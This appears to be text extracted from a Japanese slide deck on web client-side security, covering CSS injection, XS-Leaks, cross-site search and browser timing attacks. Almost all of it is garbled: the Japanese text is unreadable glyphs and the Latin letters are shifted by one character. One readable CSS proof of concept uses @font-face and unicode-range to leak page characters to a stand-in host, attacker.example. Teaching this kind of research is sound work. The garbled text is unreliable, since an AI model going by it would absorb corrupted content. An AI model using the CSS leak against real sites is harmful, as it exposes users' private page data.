
˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ߈ܸͷΞΠσΞ 3FDVSTJWF*NQPSU5FDIOJRVF$44*OKFDUJPO ‣ ར఺ ‣ ॳΊʹTUZMFλάҰͭΛ஫ೖ͢Δ͚ͩͰ͢Ήɻ ‣ ϦΫΤετ͝ͱʹมԽͯ͠͠·͏Α͏ͳ஋Ͱ͋ͬͯ΋ϦʔΫͰ͖Δʂ ‣ େࣄͳͱ͜Ζ ‣ ࠶ؼతʹ$44ΛJNQPSU͢Δɻ ‣ ΋ͬͱ΋࠶ؼతͰ͋Δඞཁ͸ͳ͘ɺฒྻͤͯ͞΋Α͍ɻ ‣ ϦΫΤετʹରͯ͠௚ͪʹฦ౴ͤͣɺ४උ͕Ͱ͖͔ͯΒฦ౴͢Δɻ ‣ ஫ҙ ‣ $44ͷద༻༏ઌ౓ͷ໰୊Ͱɺ࣮͸͜ͷ··Ͱ͸ಈ͔ͳ͍ɻ

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ิ଍ $44*OKFDUJPO΋ͬͱֶͼ͍ͨ͋ͳͨͷͨΊʹ ‣ 3FDVSTJWF*NQPSU5FDIOJRVFʹؔͯ͠͸ɺ߈ܸ༻ͷεΫϦϓτͷ ࣮૷͕ͦΕͳΓʹ໘౗Ͱ͋Δɻ ‣ )551Λ஻Δαʔό͕ඞཁͳͨΊɻ ‣ ࣗಈԽͷͨΊͷπʔϧ͕ެ։͞ΕΔΑ͏ʹͳ͖ͬͯͨɻ ‣ IUUQTHJUIVCDPNEOVUQUSTJD ‣ IUUQTHJUIVCDPNNPOTFO ‣ ͜ΕΛҰ౓ࣗ෼Ͱॻ͍ͯΈΔͷ͸͘͢͝ษڧʹͳΔɻ ‣ ࢀߟ ‣ IUUQTYDMMHJUIVCJPQPTUT$44*OKFDUJPO1SJNJUJWFT

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ༨ஊߴ଎Խɾ࠷దԽͷฐ֐ $44*OKFDUJPO΍5SBOTJFOU&YFDVUJPO"UUBDLTΛྫʹ ‣ ؾ͖ͮߴ଎Խ΍࠷దԽ͸ɺ͠͹͠͹ηΩϡϦςΟ্ͷ໰୊Λ༠ಋ͠ ͯ͠·͏ʜɻ ‣ ྫ౤ػత࣮ߦͷΑ͏ͳ࢓૊Έ͕5SBOTJFOU&YFDVUJPO"UUBDLTΛ༠ ಋͨ͠ɻ ‣ ྫ ϒϥ΢βʹ͓͚Δ $440.ͷߏஙͱϨϯμϦϯάπϦʔߏஙͷ ύΠϓϥΠϯԽ ͕3FDVSTJWF*NQPSU5FDIOJRVFΛ༠ಋͨ͠ɻ ‣ ྫΩϟογϡ͕λΠϛϯά߈ܸͷོ੝Λ༠ಋͨ͠ɻ ‣ ໰ߴ଎Խɾ࠷దԽͱηΩϡϦςΟͱͷڞଘͷಓ͸͋ΔͩΖ͏͔ɻ

&YFSDJTF $44*OKFDUJPO$IBMMFOHF IUUQTDTTJDIBMMFOHFIBDRNF

94-FBLTBOE944FBSDI

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ جຊతͳΞΠσΞ 94-FBLT 944FBSDI ‣ ٙ໰੬ऑੑͷͳ͍8FCΞϓϦέʔγϣϯʹରͯ͠ɺͳΜΒ͔ͷ߈ ܸΛߦ͏͜ͱ͸Ͱ͖ͳ͍͔ɻ ‣ ΞΠσΞ$SPTT0SJHJOͰ΋؍ଌͰ͖Δཁૉ͸ɺݶΒΕ͍ͯΔ͕ɺ ݩʑͷ)5.-จॻͷத਎ɾߏ଄ͷਪଌͷώϯτʹͳΔɻ ‣ $SPTT0SJHJOͰ΋؍ଌͰ͖Δཁૉ͸ͦͷϦιʔεͷࣹӨͰ͋Δɻ ‣ ద౰ͳԾఆΛஔ͚͹ɺ౰֘ϦιʔεΛਪଌͰ͖Δ͔΋͠Εͳ͍ɻ ‣ $SPTT0SJHJOͰ΋؍ଌͰ͖Δཁૉ͸ɺ࣍ͷΑ͏ʹ෼ྨͰ͖Δɻ ‣ ެࣜʹఏڙ͞Ε͍ͯΔ΋ͷ FHXJOEPXMFOHUI ‣ αΠυνϟωϧతख๏ʹΑΓ؍ଌͰ͖Δ΋ͷ

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ $SPTTTJUF-FBLT4FBSDI 94-FBLT 944FBSDI ‣ $SPTTTJUFMFBLT 94-FBLT ͱ͸ɺϒϥ΢β্ͰͷαΠυνϟ ωϧͨͪͷ૯শͰ͋Δɻ΍΍ޠฐ͸͋Δ͕ɻ ‣ 94-FBLT߈ܸͱ͸ͦΕΒΛར༻ͨ͠αΠυνϟωϧ߈ܸͷ͜ͱɻ ‣ ͱ͘ʹ܁Γฦ͠ͷ໰͍߹Θͤͷޙɺ؍ଌ͢Δɺͱ͍͏ྲྀΕ͔Β ͳΔ߈ܸ͸ɺ$SPTTTJUF4FBSDI 944FBSDI ͱݺ͹ΕΔɻ ‣ ྫ͑͹ҎԼͷ΍ΓͱΓ͔ΒɺϘϒͱΫϦε͸͖ͬͱ஌Γ߹͍ͩͱݴ͑ Δ͠ɺϘϒͱΞϦε͸஌Γ߹͍Ͱ͸ͳͦ͞͏ͩͱ෼͔Δɻ ‣ ʮϘϒɺΫϦεͱͷؒͰૹड৴ͨ͠ϝʔϧͷ݅਺͸Կ݅ʁΞϦεͱ͸ʁʯ ‣ ʮΫϦεͱ͸݅ɺΞϦεͱ͸͔݅ͳɻʯ ‣ ͜Εͱࣅͨ͜ͱΛߦ͏ͷ͕944FBSDIͱݺ͹ΕΔ߈ܸɻ

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ εΩʔϜ 944FBSDI ‣ (FMFSOUFSFUBM ‣ ߩݙ944FBSDIͷख๏ΛγεςϚνοΫʹهड़ͨ͠ɻ ‣ 944FBSDIͰར༻͢ΔͷʹͲͷ౷ܭख๏͕ద੾͔ͷݕ౼Λߦͬͨ఺ɻ ‣ $SPTCZFUBM ͷ#PYUFTUͷ࠾༻ 4"$SPTCZ %48BMMBDI BOE3)3JFEJ l0QQPSUVOJUJFTBOE-JNJUTPG3FNPUF5JNJOH"UUBDLT z"$.5SBOT *OG4ZTU4FDVS WPM OP +BO ‣ λΠϛϯάνϟωϧͷBNQMJpDBUJPOख๏ͷఏҊɻ ‣ EJWJEFBOEDPORVFSΞϧΰϦζϜͷఏҊɻ ‣ /(FMFSOUFSBOE")FS[CFSH l$SPTT4JUF4FBSDI"UUBDLT zJO1SPDFFEJOHTPGUIFOE"$.4*(4"$$POGFSFODFPO $PNQVUFSBOE$PNNVOJDBUJPOT4FDVSJUZ QQr ‣ ࣍ϖʔδҎ߱Ͱ(FMFSOUFSFUBM ͷεΩʔϜΛઆ໌͢Δɻ

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ۩ମྫΛϕʔεʹߟ͑Δ 94-FBLT 944FBSDI ‣ લఏ࣍ͷ৚݅Λຬͨ͢ΦϯϥΠϯϝʔϧαʔϏε͕͋ͬͨͱ͢Δɻ ‣ ϝʔϧϘοΫεͷݕࡧ༻"1*Λ͍࣋ͬͯΔɻ ‣ ͦͷ"1*͸ɺݕࡧϫʔυΛड͚औΓɺݕࡧ݁ՌΛฦ͢ɻ ‣ ͦͷ"1*͸ɺݕࡧ݁Ռ͕ଟ͍ͱ͖΄Ͳɺॲཧʹ͕͔͔࣌ؒΔɻ ‣ ΋͠ҎԼͷͭͷ஋Λ߈ܸऀ͕؍ଌͰ͖Δͱ͢Δɻ ‣ ͭ΋ݕࡧ݁Ռ͕ͳͦ͞͏ͳϫʔυͰݕࡧͨ͠ͱ͖ʹ͔͔Δ࣌ؒ ‣ ޠ Ͱݕࡧͨ͠ͱ͖ʹ͔͔Δ࣌ؒ ‣ ΞΠσΞ ͷେ͖͞ΛݟΕ͹ɺϝʔϧϘοΫεதʹޠ ͕୔ࢁ ͋Δ͔෼͔Δɻ܁Γฦ͜͠ΕΛར༻͢ΔͱɺϢʔβʔͷૉੑ͕ු͔ ͼ্͕Δʂ t1 t2 w t2 − t1 w

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ۩ମྫ 944FBSDIΦϯϥΠϯϝʔϧαʔϏεͷ৔߹ %VNNZ3FRVFTU 3FTQPOTF $IBMMFOHF3FRVFTU 3FTQPOTF 7JDUJN 4FSWJDF 7JDUJN 6TFS "UUBDLFS *OJUJBUF $PMMFDU 3FTVMUT ʮ͜ͷ஫จʹ͕֮͑ͳ͍৔߹ ͸ɺ͜ͷϦϯΫΛΫϦοΫʯ

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ۩ମྫ 944FBSDIΦϯϥΠϯϝʔϧαʔϏεͷ৔߹ %VNNZ3FRVFTU 3FTQPOTF $IBMMFOHF3FRVFTU 3FTQPOTF 7JDUJN 4FSWJDF 7JDUJN 6TFS "UUBDLFS *OJUJBUF $PMMFDU 3FTVMUT ʮHSXHHSOHXPSHIH OPHKHʯͷݕࡧ݁ՌΛ໰͍߹Θ ͤΔɻ݁Ռ͸ۭͳ͸ͣɻ

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ۩ମྫ 944FBSDIΦϯϥΠϯϝʔϧαʔϏεͷ৔߹ %VNNZ3FRVFTU 3FTQPOTF $IBMMFOHF3FRVFTU 3FTQPOTF 7JDUJN 4FSWJDF 7JDUJN 6TFS "UUBDLFS *OJUJBUF $PMMFDU 3FTVMUT ʮ"MJDFʯͰݕࡧ͢Δɻ ΋͠ݕࡧ݁Ռͷಛ௃ྔ FHα Πζ ॲཧ࣌ؒ FUD ͕ %VNNZ3FRVFTUͱ͍͔ۙ൑ ఆ͢Δͱɺۭ͔ͦ͏Ͱͳ͍͔ ͕ਪଌͰ͖Δɻ

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ۩ମྫ 944FBSDIΦϯϥΠϯϝʔϧαʔϏεͷ৔߹ %VNNZ3FRVFTU 3FTQPOTF $IBMMFOHF3FRVFTU 3FTQPOTF 7JDUJN 4FSWJDF 7JDUJN 6TFS "UUBDLFS *OJUJBUF $PMMFDU 3FTVMUT ͷεςοϓΛ܁Γฦ͢ɻ ͢ΔͱɺϝʔϧϘοΫεʹొ ৔͕ͪ͠ͳޠ ਓ໊ɺ৔ ॴɺʜ ͕෼͔ͬͯ͘Δʂ

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ۩ମྫ 944FBSDIΦϯϥΠϯϝʔϧαʔϏεͷ৔߹ %VNNZ3FRVFTU 3FTQPOTF $IBMMFOHF3FRVFTU 3FTQPOTF 7JDUJN 4FSWJDF 7JDUJN 6TFS "UUBDLFS *OJUJBUF $PMMFDU 3FTVMUT ߈ܸऀ͸ద౰ͳλΠϛϯάͰ ݁ՌΛճऩ͢Δ

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ 944FBSDI࠶ߟ 0SBDMFʜਆୗػց ‣ ݴ͍׵͑Δͱɺ944FBSDI͸94-FBLTΛ൑ఆ໰୊ͷΦϥΫϧԽ ͯ͠ར༻͢Δ߈ܸͷ͜ͱͰ͋Δɺͱ΋ݴ͑Δɻ ‣ ΦϥΫϧਆୗػց ‣ ͜͜·Ͱͷ۩ମྫͷ৔߹ ‣ 355 Ұछͷ94-FBLT ΛʮϝʔϧϘοΫεதʹ͋Δޠ ͕ଟؚ͘ ·ΕΔ͔ʯͱ͍͏൑ఆ໰୊Λղ͍ͯ͘ΕΔΦϥΫϧԽͨ͠ɻ ‣ ద੾ͳ౷ܭख๏Λར༻ͯ͠΍Ε͹ɺ͜ͷΦϥΫϧ͸ਖ਼͍݁͠ՌΛग़ྗ͢Δ ΋ͷͱߟ͑ͯΑ͘ͳΔɻඇৗʹࡶͳߟ͑ํ͕ͩɻ ‣ ͜ͷΦϥΫϧΛར༻ͯ͠ɺϢʔβʔͷૉੑΛ͋ͿΓग़ͨ͠ɻ w

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ 0VUMJOF944FBSDI (FMFSOUFS ʹΑΔOPUBUJPOΛར༻ͨ͠ %VNNZ3FRVFTU 3FTQPOTF $IBMMFOHF3FRVFTU 3FTQPOTF 7JDUJN 4FSWJDF 7JDUJN 6TFS "UUBDLFS *OJUJBUF $PMMFDU 3FTVMUT

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ 0VUMJOF944FBSDI (FMFSOUFS ʹΑΔOPUBUJPOΛར༻ͨ͠ %VNNZ3FRVFTU 3FTQPOTF $IBMMFOHF3FRVFTU 3FTQPOTF 7JDUJN 4FSWJDF 7JDUJN 6TFS "UUBDLFS *OJUJBUF $PMMFDU 3FTVMUT ߈ܸऀ͕ඃ֐ऀΛ᠘ϖʔδʹ༠ ಋ͢Δɻ

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ 0VUMJOF944FBSDI (FMFSOUFS ʹΑΔOPUBUJPOΛར༻ͨ͠ %VNNZ3FRVFTU 3FTQPOTF $IBMMFOHF3FRVFTU 3FTQPOTF 7JDUJN 4FSWJDF 7JDUJN 6TFS "UUBDLFS *OJUJBUF $PMMFDU 3FTVMUT ߈ܸऀ͸࢝Ίʹɺ݁Ռ͕෼͔Γ͖ͬͯ ͍Δ໰͍߹ΘͤΛૹ৴͠ %VNNZ 3FRVFTU ɺͦͷಛ௃ྔΛ94-FBLT Λ༻͍ͯಘͯɺͦΕΛ͓֮͑ͯ͘ɻ ͜ͷखॱʹΑΓɺҎ߱͸૬ର஋ϕʔε ͷٞ࿦͕Ͱ͖Δɻ

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ 0VUMJOF944FBSDI (FMFSOUFS ʹΑΔOPUBUJPOΛར༻ͨ͠ %VNNZ3FRVFTU 3FTQPOTF $IBMMFOHF3FRVFTU 3FTQPOTF 7JDUJN 4FSWJDF 7JDUJN 6TFS "UUBDLFS *OJUJBUF $PMMFDU 3FTVMUT ࣮ࡍͷ໰͍߹ΘͤΛߦ͏ɻ ͜͜ͰಘΒΕͨϨεϙϯεͷಛ ௃ྔͱ%VNNZ3FRVFTU͔Β ಘͨಛ௃ྔͷ૬ର஋Λ΋ͱʹɺ 3FTQPOTFͷಛੑΛ෮ݩ͢Δɻ

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ 0VUMJOF944FBSDI (FMFSOUFS ʹΑΔOPUBUJPOΛར༻ͨ͠ %VNNZ3FRVFTU 3FTQPOTF $IBMMFOHF3FRVFTU 3FTQPOTF 7JDUJN 4FSWJDF 7JDUJN 6TFS "UUBDLFS *OJUJBUF $PMMFDU 3FTVMUT ͷεςοϓΛ܁Γฦ͢

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ 0VUMJOF944FBSDI (FMFSOUFS ʹΑΔOPUBUJPOΛར༻ͨ͠ %VNNZ3FRVFTU 3FTQPOTF $IBMMFOHF3FRVFTU 3FTQPOTF 7JDUJN 4FSWJDF 7JDUJN 6TFS "UUBDLFS *OJUJBUF $PMMFDU 3FTVMUT ߈ܸऀ͸ద౰ͳλΠϛϯάͰ ݁ՌΛճऩ͢Δ

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ಛੑ 944FBSDI 94-FBLT ‣ 94-FBLT944FBSDI͸ҎԼͷΑ͏ͳੑ࣭Λ࣋ͭɻ ‣ Ϧιʔε͕௚઀ϦʔΫ͞ΕΔΘ͚Ͱ͸ͳ͍ɻ ‣ 944 $44*OKFDUJPO౳ͱ͸ҟͳΔɻ401͕͋ΔͨΊɻ ‣ Ϧιʔεͷಛ௃ྔ͕ϦʔΫ͞ΕΔɻ ‣ FH͋Δ஋͕౰֘Ϧιʔεʹؚ·Ε͍ͯΔ͔Ͳ͏͔ɻ ‣ ݕࡧͷ৔߹͋Δ஋͕Ϣʔβʔͷ΋ͭϦιʔεͷதʹؚ·Ε͍ͯΕ͹ɺݕ ࡧ݁ՌͷϨεϙϯε௕͸௕͍͸ͣɻ ‣ FHϦιʔε͕ͲΕ΄Ͳෳࡶ͔େ͖͍͔ɻ ‣ ෳࡶͳେ͖͍Ϩεϙϯε΄Ͳॲཧʹ͔͔Δ࣌ؒ͸௕͍͸ͣɻ

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ྺ࢙ 94-FBLT 944FBSDI ͍ܰϒʔϜ͕དྷͨ ೥͝Ζ͔Βʁ ɻ )551$BDIF$SPTT4JUF-FBLT IUUQTJSEBSDLDBUCMPHTQPUDPNIUUQDBDIFDSPTTTJUFMFBLTIUNM $SPTT4JUF$POUFOUBOE4UBUVT5ZQFT-FBLBHF IUUQTNFEJVNDPNCVHCPVOUZXSJUFVQDSPTTTJUFDPOUFOUBOETUBUVTUZQFTMFBLBHFFGEBCB &WBOT͕ݪ࢝తͳ944FBSDI JNHͱλΠϛϯά৘ใʹΑΔ΋ ͷ ΛఏҊͨ͠ &WBOT ɻ $SPTTEPNBJOTFBSDIUJNJOH IUUQTTDBSZCFBTUTFDVSJUZCMPHTQPUDPNDSPTTEPNBJOTFBSDIUJNJOHIUNM (FMFSOUFSFUBM͕944FBSDIΛ͋Δఔ౓ମܥԽͯ͠هड़ɾݕ౼ ͨ͠ (FMFSOUFSFUBM ɻ࣮ੈքͰͷ߈ܸྫ΋ఏࣔ͞Εͨɻ

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ݱࡏਐߦܥͷݚڀͨͪ 94-FBLTʹ·ͭΘΔ࠷ۙͷݚڀ ‣ ࠓ΋94-FBLTΛར༻ͨ͠߈ܸʹؔ͢Δݚڀ͸ਐΜͰ͍Δɻ ‣ -FBLZ*NBHFT 4UBJDVBOE1SBEFM ‣ $"4UBJDVBOE.1SBEFM l-FBLZ*NBHFT5BSHFUFE1SJWBDZ"UUBDLTJOUIF8FC zJOUI64&/*94FDVSJUZ 4ZNQPTJVN 64&/*94FDVSJUZ QQr ‣ $SPTT0SJHJO4UBUF*OGFSFODF"UUBDLT 4VEIPEBOBOFUBM ‣ "4VEIPEBOBO 4,IPEBZBSJ BOE+$BCBMMFSP l$SPTT0SJHJO4UBUF*OGFSFODF $04* "UUBDLT-FBLJOH8FC4JUF 4UBUFTUISPVHI94-FBLT zBS9JW1SFQSBS9JW ‣ ϒϩάϨϕϧͰ΋༷ʑͳهࣄ͕ొ৔͖͍ͯͯ͠Δɻ ‣ 94-FBL%FUFDUJOH*%TVTJOH1PSUBM ‣ .BTT944FBSDIVTJOH$BDIF"UUBDL ‣ ͱͯ΋Ξπ͍ͷͰ௥͍͔͚͍ͯΔͱָ͍͠ɻ

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ࢀߟจݙ 94-FBLT 944FBSDI΋ͬͱֶͼ͍ͨ͋ͳͨͷͨΊʹ ‣ zYTMFBLTYTMFBLT IUUQTHJUIVCDPNYTMFBLTYTMFBLTXJLJ-JOLT ‣ /FX94-FBLUFDIOJRVFTSFWFBMGSFTIXBZTUPFYQPTFVTFS JOGPSNBUJPOCZ1PSU4XJHHFS IUUQTQPSUTXJHHFSOFUEBJMZTXJHOFXYTMFBLUFDIOJRVFTSFWFBMGSFTIXBZTUPFYQPTFVTFSJOGPSNBUJPO ‣ 94-FBLTBOE944FBSDICZ(PPHMF IUUQTTJUFTHPPHMFDPNTJUFCVHIVOUFSVOJWFSTJUZOPOWVMOYTMFBLT

&YBNQMF 'SBNF$PVOU

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ XJOEPXMFOHUI $SPTT0SJHJOͰ΋ಡΊΔϓϩύςΟͷ୅දྫ ‣ લఏ ‣ ஌ࣝXJOEPXMFOHUI͸౰֘XJOEPXதͷGSBNFͷݸ਺Λฦ͢ɻ ‣ ิ଍XJOEPXMFOHUIXJOEPXGSBNFTMFOHUI ‣ ஌ࣝ401ԼͰ͋ͬͯ΋ɺXJOEPXMFOHUIͷ$SPTT0SJHJOͳಡΈग़ ͠͸ڐՄ͞Ε͍ͯΔɻ ‣ ࢀߟ.%/ IUUQTEFWFMPQFSNP[JMMBPSHFO64EPDT8FC4FDVSJUZ4BNFPSJHJO@QPMJDZ ‣ ໰͜ΕΛ߈ܸʹར༻Ͱ͖ΔγνϡΤʔγϣϯ͸ଘࡏ͢Δ͔ɻ͋Δͷ Ͱ͋Ε͹ɺͦΕ͸ͲͷΑ͏ͳ৔߹͔ɻ

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ 944FBSDIʹ΋ͪ͜Ή XJOEPXMFOHUIͷΦϥΫϧԽͱͦͷར༻ ‣ લఏ ‣ ߈ܸର৅ͷϖʔδ΁ͷXJOEPXΦϒδΣΫτ΁ͷࢀরΛ߈ܸऀ͕ಘΔ ͜ͱ͕Ͱ͖Δ ஫ҙ$001 9'0 ɻ ‣ ߈ܸର৅ͷϖʔδͷϑϨʔϜͷ਺ͱɺϖʔδͷ࣋ͭঢ়ଶ FHਖ਼ৗܥͷ ϖʔδͳͷ͔ɺҟৗܥͷϖʔδͳͷ͔ ʹ૬͕ؔ͋Δɻ ‣ ΦϥΫϧԽ ‣ XJOEPXMFOHUIΛ؍ଌ͢Δ͜ͱͰɺϖʔδͷ࣋ͭঢ়ଶ͕෼͔Δɻ

&YBNQMF 4UBUVT$PEF

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ PCKFDUλά PCKFDUλάͷΈʹΑΔεςʔλείʔυϦʔΫ ‣ 4UBDJVFUBM ઌड़ ͰఏҊ͞Εͨ-FBLZ*NBHFTͳΔ߈ܸख ๏ͷͭͷखஈͱͯ͠͸ɺ࣍ͷΑ͏ͳ΋ͷؚ͕·Ε͍ͯΔɻ ‣ ΞΠσΞਖ਼ৗܥ YY ܥͷ৔߹͸GBMMCBDL͕ى͜Βͳ͍ɻ ‣ ໰୊ਖ਼ৗܥͷ৔߹ͷ؍ଌ͕গ͠໽հɻ

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ PCKFDUλά $44Λ૊Έ߹ΘͤͨεςʔλείʔυϦʔΫ ‣ IUUQTUXJUUFSDPNUFSKBORTUBUVT @font-face{ font-family: poc; src: url(http://attacker.example/?leak); unicode-range:U+0041; } #poc{ font-family: 'poc'; } A

&YBNQMF 5JNJOH*OGPSNBUJPO

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ݪ࢝తͳΞΠσΞ 8FCʹ͓͚ΔλΠϛϯά߈ܸ ‣ ॳظͷΞΠσΞ 'FMUFOBOE4DIOFJEFS ‣ ϒϥ΢βͷΩϟογϡͷ༗ແ͕ɺϦιʔεͷϩʔυͷૣ͞ΛܾΊΔɻ ‣ ϒϥ΢βΩϟογϡͷ༗ແ͸ɺϒϥ΢βཤྺΛ൓ө͍ͯ͠Δɻ ‣ ͢ͳΘͪɺϦιʔεͷಡΈࠐΈ଎౓͸ɺϒϥ΢βཤྺΛ൓ө͠͏Δɻ ‣ ͜ͷݚڀ͕8FCʹ͓͚ΔλΠϛϯά߈ܸͷ࿦จͰ͸Α͘Ҿ༻͞Εͯ ͍Δɻ ‣ ΞΠσΞΩϟογϡҎ֎ʹؔͯ͠΋ɺ࣌ؒܭଌͷ݁Ռ͸ɺͳΜΒ͔ͷ৘ ใΛؚΜͰ͍ΔͷͰ͸ͳ͍͔ɻ ‣ &8'FMUFOBOE."4DIOFJEFS l5JNJOH"UUBDLTPO8FC1SJWBDZ zJO1SPDFFEJOHTPGUIFUI"$.$POGFSFODFPO$PNQVUFSBOE $PNNVOJDBUJPOT4FDVSJUZ QQr

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ 5JNJOH"UUBDL 8FC αΠυνϟωϧ߈ܸͷԦ༷ ‣ ໰ΑΓҰൠʹɺϒϥ΢β্Ͱͷ࣌ؒܭଌ͔ΒಘΒΕΔ৘ใ͸ɺͲͷ Α͏ʹͯ͠߈ܸʹར༻Ͱ͖ΔͩΖ͏͔ɻ ‣ FHϦΫΤετ͔ͯ͠ΒϨεϙϯε͕ฦͬͯ͘Δ·Ͱͷ࣌ؒɻ ‣ αʔόଆͰͷॲཧʹ͔͔ͬͨ࣌ؒʹ͍ۙ஋ʹͳΔɻ ‣ FHϨεϙϯε͕ฦ͖͔ͬͯͯΒPOMPBEΠϕϯτ·Ͱͷ࣌ؒɻ ‣ ΫϥΠΞϯτ͕ϨεϙϯεΛॲཧ ύʔε ϨϯμϦϯά ʜ ͢Δͷʹ͔ ͔ͬͨ࣌ؒʹ͍ۙ஋ʹͳΔɻ ‣ 8FCʹ͓͚ΔλΠϛϯά߈ܸ͸ɺ࣍ͷ؍఺Ͱ෼ྨ͞ΕΔɻ ‣ $POOFDUJWJUZEJSFDUPSDSPTTTJUF ‣ 5BSHFU5JNJOHTFSWFSTJEFUJNJOHPSDMJFOUTJEFUJNJOH

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ %JSFDU5JNJOH"UUBDL #PSU[BOE#POFI $SPTCZFUBM ‣ ֓ཁϦʔΫ͍ͨ͠৘ใ͕8FCΞϓϦέʔγϣϯશମͷڍಈʹӨڹ Λ༩͑Δ৔߹Λ૝ఆͨ͠߈ܸͷ͜ͱɻ ‣ ݚڀͷྫ ‣ 8FCΞϓϦέʔγϣϯͷॲཧ࣌ؒͷ؍ଌʹΑΓɺαʔόʔதͷॲཧؔ ࿈ͷσʔλͷαΠζΛϦʔΫ͢Δݚڀ #PSU[BOE#POFI ɻ "#PSU[BOE%#POFI l&YQPTJOH1SJWBUF*OGPSNBUJPOCZ5JNJOH8FC"QQMJDBUJPOT zJO1SPDFFEJOHTPGUIF UI*OUFSOBUJPOBM$POGFSFODFPO8PSME8JEF8FC QQr ‣ ωοτϫʔΫӽ͠ͷλΠϛϯά߈ܸͰ͋ͬͯ΋ɺ౷ܭख๏Λ޻෉͢Δ ͱɺඇৗʹྑ͍ਫ਼౓͕࣮ݱ͢Δݚڀ $SPTCZFUBM ઌड़ ɻ ‣ #PYUFTUͱݺ͹ΕΔ౷ܭख๏͸ޙͷݚڀͰ΋ଟ༻͞Ε͍ͯΔɻ

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ $SPTTTJUF5JNJOH"UUBDL #PSU[BOE#POFI ‣ ϦʔΫ͍ͨ͠৘ใ͸ɺ8FCΞϓϦέʔγϣϯશମͷڍಈʹ͸ӨڹΛ ༩͑ͳ͍͕ɺͦΕΛอ࣋͢ΔϢʔβʔ͕ߦ͑Δૢ࡞ʹ͸ӨڹΛ༩͑ Δ৔߹Λ૝ఆͨ͠߈ܸͷ͜ͱɻ ‣ αʔόʔαΠυͷ࣌ؒʹண໨ͨ͠ݚڀ ‣ &WBOT ઌड़ ΍(FMFSOUFSFUBM ઌड़ ͕୅දత ‣ ΫϥΠΞϯταΠυͷ࣌ؒʹண໨ͨ͠ݚڀ ‣ #SPXTFSCBTFEUJNJOHBUUBDLTͱ΋ݺ͹ΕΔɻ ‣ $BDIFػߏͷ׆༻7BO(PFUIFNFUBM ޙड़ ‣ $44ͷ׆༻4UPOF ,PUDIFSFUBM 4NJUIFUBM ౳ ޙड़

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ 4FWFSTJEF5JNJOH XJUI$SPTTTJUF5JNJOH"UUBDL ‣ ΞϓϦέʔγϣϯϩδοΫΛ্ख͘࢖ͬͯɺʮ͋Δ৚͕݅੒Γཱͭ ͔ʯΛαʔόαΠυͰͷॲཧ࣌ؒͷ௕୹ͱؔ࿈෇͚Δ͜ͱͰɺγϯ ϓϧͳ355͕$SPTTTJUFͳλΠϛϯά߈ܸʹར༻Ͱ͖Δɻ ‣ ྫ ‣ "3PVHI*EFBPG#MJOE3FHVMBS&YQSFTTJPO*OKFDUJPO "UUBDL IUUQTEJBSZTIJGUKTJOGPCMJOESFHVMBSFYQSFTTJPOJOKFDUJPO ‣ &WBOT ઌड़ ‣ (FMFSOUFSFUBM ઌड़

&YFSDJTF #MJOE3FHFY*OKFDUJPO IUUQTCSFHFYDIBMMFOHFUSBJOJOHIBDRNF

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ $MJFOUTJEF5JNJOH XJUI$SPTT4JUF5JNJOH"UUBDL ‣ ΞΠσΞϦιʔεಡΈࠐΈͷ࣌ؒ͸ϦιʔεͷαΠζͱͷ૬ؔΛ΋ ͭ ͸ͣ ɻ ‣ ໰୊/FUXPSLKJUUFS΍αʔόʔෛՙʹΑΔ355஗Ԇ͕࣌ؒܭଌʹ ৐Δͱɺຊ౰ʹܭଌ͍͕ͨ࣌ؒ͠ଌΕͳ͍ɻ ‣ ݚڀͷྫ7BO(PFUIFNFUBM͸ɺ࣍ͷΑ͏ͳϞμϯͳ8FC"1* Λར༻͢Δ͜ͱʹΑΓɺΫϥΠΞϯταΠυͰͷϦιʔεಡΈࠐΈ ͷ࣌ؒΛਖ਼֬ͳܭଌΛୡ੒ͨ͠ 7BO(PFUIFNFUBM ɻ ‣ FH$BDIF"1* PG4FSWJDF8PSLFS ‣ FH"QQMJDBUJPO$BDIF ‣ 57BO(PFUIFN 8+PPTFO BOE//JLJGPSBLJT l5IF$MPDLJT4UJMM5JDLJOH5JNJOH"UUBDLTJOUIF.PEFSO8FC zJO1SPDFFEJOHTPG UIFOE"$.4*(4"$$POGFSFODFPO$PNQVUFSBOE$PNNVOJDBUJPOT4FDVSJUZ QQr

